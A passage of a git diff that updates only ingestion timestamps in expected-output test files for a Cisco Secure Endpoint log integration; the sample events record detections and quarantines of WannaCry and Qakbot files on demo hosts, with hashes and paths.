ion\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -4089,7 +4089,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461808700Z", + "ingested": "2021-12-14T14:40:57.457061761Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":286000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -4163,7 +4163,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461814700Z", + "ingested": "2021-12-14T14:40:57.457062237Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648143", "kind": "alert", 
@@ -4235,7 +4235,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461820300Z", + "ingested": "2021-12-14T14:40:57.457062654Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":802000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204901661835277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -4311,7 +4311,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461824200Z", + "ingested": "2021-12-14T14:40:57.457063015Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867976\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json index b22bbab8b1f..1114a09fe7f 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json 
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json @@ -28,7 +28,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388856300Z", + "ingested": "2021-12-14T14:41:01.444853387Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -116,7 +116,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388859800Z", + "ingested": "2021-12-14T14:41:01.444856124Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":459000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204901661835279\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -202,7 +202,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388865700Z", + "ingested": "2021-12-14T14:41:01.444856629Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":443000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204901661835278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -292,7 +292,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388870400Z", + "ingested": "2021-12-14T14:41:01.444857035Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204901661835276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -382,7 +382,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388875300Z", + "ingested": "2021-12-14T14:41:01.444858102Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":6000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204897366867979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -456,7 +456,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388881100Z", + "ingested": "2021-12-14T14:41:01.444858620Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204897366867971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", 
@@ -528,7 +528,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388886800Z", + "ingested": "2021-12-14T14:41:01.444859097Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411462918168117251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -604,7 +604,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388892500Z", + "ingested": "2021-12-14T14:41:01.444859715Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648143", "kind": "alert", 
@@ -692,7 +692,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388898200Z", + "ingested": "2021-12-14T14:41:01.444860267Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462918168117000,\"timestamp\":1610629065,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T12:57:45+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12\",\"md5\":\"a97fb86da4e010974860e5024137b56b\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -772,7 +772,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.388904Z", + "ingested": "2021-12-14T14:41:01.444860767Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":589000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.GenericKD:Gen.20fu.1201\",\"detection_id\":\"6411456342573187074\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "553648147", "kind": "alert", 
@@ -852,7 +852,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.388909700Z", + "ingested": "2021-12-14T14:41:01.444861312Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":558000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411456342573187073\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "code": "553648147", "kind": "alert", 
@@ -933,7 +933,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:55.388915800Z", + "ingested": "2021-12-14T14:41:01.444862055Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1492784107692000800,\"timestamp\":1610627262,\"timestamp_nanoseconds\":692000000,\"date\":\"2021-01-14T12:27:42+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610627262,\"start_date\":\"2021-01-14T12:27:42+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. 
A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75\"}}}}}", "code": "1107296274", "kind": "alert", @@ -1014,7 +1014,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.388921600Z", + "ingested": "2021-12-14T14:41:01.444862550Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458626002840536600,\"timestamp\":1610627243,\"timestamp_nanoseconds\":268148295,\"date\":\"2021-01-14T12:27:23+00:00\",\"event_type\":\"Threat Detected in Low Prevalence 